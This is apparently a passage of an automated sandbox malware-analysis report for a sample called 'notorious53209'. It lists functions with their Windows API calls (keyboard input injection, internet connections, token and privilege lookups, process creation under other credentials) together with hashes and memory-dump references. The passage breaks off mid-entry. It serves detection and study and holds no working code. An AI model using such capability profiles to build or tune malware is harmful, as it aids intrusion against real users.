                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: cbd04df267877613ee6c092af6c72fd644246147fd8b1204807e28589a2b1cc4
                                                  • Instruction ID: 161aa11d557fb4c0e04ff42c2cf03dcc65c46c39e9b17a3530e896a19f5d8ee7
                                                  • Opcode Fuzzy Hash: cbd04df267877613ee6c092af6c72fd644246147fd8b1204807e28589a2b1cc4
                                                  • Instruction Fuzzy Hash: FF31B2B4704208BEEB209E58CC55FAB3BA8EB06320F244912FAD1D66E1DE35A9809751
                                                  Function 0090ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0090AE1A
                                                  • GetWindowRect.USER32(?,?), ref: 0090AE90
                                                  • PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                                                  • MessageBeep.USER32(00000000), ref: 0090AF11
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 555572d0bb694ef8e5d53c52b8b13626eaf57a585240810f2e8120c277fac674
                                                  • Instruction ID: 98d6ed2f581c7f0713b02b92f5f885efde66ed98d800e8eea619eeaafc0747e3
                                                  • Opcode Fuzzy Hash: 555572d0bb694ef8e5d53c52b8b13626eaf57a585240810f2e8120c277fac674
                                                  • Instruction Fuzzy Hash: 5F416C7460431ADFCB11CF58C884FA9BBF9FB8A350F2481A9E9149B391D731A941DF92
                                                  Function 008E0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E1037
                                                  • SetKeyboardState.USER32(00000080), ref: 008E1053
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008E10B9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 008E110B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                                                  • Instruction ID: 75c8f80727f65f1e7e34a2d98de4870d78c41836816b7ba4ee1f69d3f74e359a
                                                  • Opcode Fuzzy Hash: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                                                  • Instruction Fuzzy Hash: 3D313930E44AC8AEFF308A6B8C0DBF9BBA9FB46314F04421AF591D25D1C77589C49752
                                                  Function 008E1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E1176
                                                  • SetKeyboardState.USER32(00000080), ref: 008E1192
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 008E11F1
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 008E1243
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                                                  • Instruction ID: a2ca438e41220570089a4e85a056552b6a92a9a844d6f63d879e2ba883f462b9
                                                  • Opcode Fuzzy Hash: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                                                  • Instruction Fuzzy Hash: 23314630A4428CAEEF30CA6B8C0C7FABBAAFB4A310F04531BF281D21D1C3744A849751
                                                  Function 008B6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B644B
                                                  • __isleadbyte_l.LIBCMT ref: 008B6479
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64A7
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64DD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: c4840d1bc78d81c28a62f29abd9adbe8d711ff94fe7b1b9a34f9e27a1310ebb8
                                                  • Instruction ID: c85f22d8505feda288e1d4d6b5d7e97d330e898232b0d6683a31c9425dc23b5e
                                                  • Opcode Fuzzy Hash: c4840d1bc78d81c28a62f29abd9adbe8d711ff94fe7b1b9a34f9e27a1310ebb8
                                                  • Instruction Fuzzy Hash: DD31E131600A4AEFDB218F64C844BFA7BA5FF41310F154429F864C72A0FB39D860DB94
                                                  Function 00905175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00905189
                                                    • Part of subcall function 008E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008E3897
                                                    • Part of subcall function 008E387D: GetCurrentThreadId.KERNEL32(00000000,?,008E52A7), ref: 008E389E
                                                    • Part of subcall function 008E387D: AttachThreadInput.USER32(00000000,?,008E52A7), ref: 008E38A5
                                                  • GetCaretPos.USER32(?), ref: 0090519A
                                                  • ClientToScreen.USER32(00000000,?), ref: 009051D5
                                                  • GetForegroundWindow.USER32 ref: 009051DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: dfabd2ce9797d4e4dd917f2fc15665d78ad6af0e0359be731172243d87efc743
                                                  • Instruction ID: c5f217f372427994a0c9aac5a9d78d2a7c7f7cb039466993d47631b7383e6b65
                                                  • Opcode Fuzzy Hash: dfabd2ce9797d4e4dd917f2fc15665d78ad6af0e0359be731172243d87efc743
                                                  • Instruction Fuzzy Hash: DA312C71900118AFDB14EFA9C885DEFB7F9FF98300F14406AE856E7241EA759E05CBA1
                                                  Function 008D8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                                                    • Part of subcall function 008D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                                                    • Part of subcall function 008D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                                                    • Part of subcall function 008D8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8689
                                                    • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008D8BEB
                                                  • _memcmp.LIBCMT ref: 008D8C0E
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008D8C44
                                                  • HeapFree.KERNEL32(00000000), ref: 008D8C4B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 2182266621-0
                                                  • Opcode ID: e219040d0a797f6b3d04f361141fabf8e8f92a1b59b61aecdd08d752cd560c30
                                                  • Instruction ID: 70534f6a569ab1ac1131e955a27f8b21cd8c269dc11c45aede5afdd722363a5b
                                                  • Opcode Fuzzy Hash: e219040d0a797f6b3d04f361141fabf8e8f92a1b59b61aecdd08d752cd560c30
                                                  • Instruction Fuzzy Hash: 6E217A71E11208EFDB10DFA4C949BEEB7B8FF44354F14419AE554E7240EB31AA46DB60
                                                  Function 008A0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __setmode.LIBCMT ref: 008A0BF2
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                                                  • _fprintf.LIBCMT ref: 008A0C29
                                                  • OutputDebugStringW.KERNEL32(?), ref: 008D6331
                                                    • Part of subcall function 008A4CDA: _flsall.LIBCMT ref: 008A4CF3
                                                  • __setmode.LIBCMT ref: 008A0C5E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 38a3f4c7d41a8744d87d0a842cb160748d832bc25b8a161d312922191b1b67ea
                                                  • Instruction ID: c12aeb22a6cc1338f43fc80373da2a28f0d81c60ef5cd1e356817924878b0c3b
                                                  • Opcode Fuzzy Hash: 38a3f4c7d41a8744d87d0a842cb160748d832bc25b8a161d312922191b1b67ea
                                                  • Instruction Fuzzy Hash: 991105319042087FEB04B7BC9C429BE7B69FF82320F14011AF205D7692DEA15D525793
                                                  Function 008F1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F1A97
                                                    • Part of subcall function 008F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F1B40
                                                    • Part of subcall function 008F1B21: InternetCloseHandle.WININET(00000000), ref: 008F1BDD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                                                  • Instruction ID: ca79a5d18ae81746b48762dda67a7a6e581c110a61f923f9a1d80fd760333ab8
                                                  • Opcode Fuzzy Hash: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                                                  • Instruction Fuzzy Hash: C1219F35204609FFDB229F748C09FBAB7A9FF88711F10001AFB11E6651EB719911ABA1
                                                  Function 008DE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF5BC
                                                    • Part of subcall function 008DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 008DF5E2
                                                    • Part of subcall function 008DF5AD: lstrcmpiW.KERNEL32(00000000,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF613
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE1DD
                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 008DE203
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE237
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: aabbb54406b1106201187b3f505b0f942792c6dffed8ce56e4c841770f34592e
                                                  • Instruction ID: 9fa40c9264cad39540348ce82192fa52ec510544e985854517dba38c5c813325
                                                  • Opcode Fuzzy Hash: aabbb54406b1106201187b3f505b0f942792c6dffed8ce56e4c841770f34592e
                                                  • Instruction Fuzzy Hash: C211BE36204305EFCB25AF68DC45A7A77B9FF85350B40422BF816CB2A0EB71A95097A1
                                                  Function 008B5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 008B5351
                                                    • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                                    • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                                    • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 008A598F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: e2fc67afae742d9b71162510b5ff0ae431c032f029bffd699a4f83f89b341018
                                                  • Instruction ID: 13218e2f43c44f77920037b5f8315c31ae2303cb6df1a35ccaa654e44aad8444
                                                  • Opcode Fuzzy Hash: e2fc67afae742d9b71162510b5ff0ae431c032f029bffd699a4f83f89b341018
                                                  • Instruction Fuzzy Hash: 1D11C432908A15AEDB312F78AC1579E37D4FF1B3E0B200429F904DA791DFB589409751
                                                  Function 00884531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00884560
                                                    • Part of subcall function 0088410D: _memset.LIBCMT ref: 0088418D
                                                    • Part of subcall function 0088410D: _wcscpy.LIBCMT ref: 008841E1
                                                    • Part of subcall function 0088410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                                                  • KillTimer.USER32(?,00000001), ref: 008845B5
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008845C4
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008BD6CE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: 9ad27caf57b7175329e6278930f6f66d2dac226e16b368de7019a3f7b2a2ca4d
                                                  • Instruction ID: 753288b485e1969ab48e02703aa7aa0eb940c9a4b3986d82e769273260e858ee
                                                  • Opcode Fuzzy Hash: 9ad27caf57b7175329e6278930f6f66d2dac226e16b368de7019a3f7b2a2ca4d
                                                  • Instruction Fuzzy Hash: 3B21DD71908744AFE7329B24DC55BEBBBECFF12308F04009EE69DD6241D7745A849B51
                                                  Function 008D8AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008D8B2A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 008D8B31
                                                  • CloseHandle.KERNEL32(00000004), ref: 008D8B4B
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008D8B7A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 2621361867-0
                                                  • Opcode ID: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                                                  • Instruction ID: c74699a98912e11c1d451ef48ff50fffcb2b7772ee0a69d6780e0329ec36678e
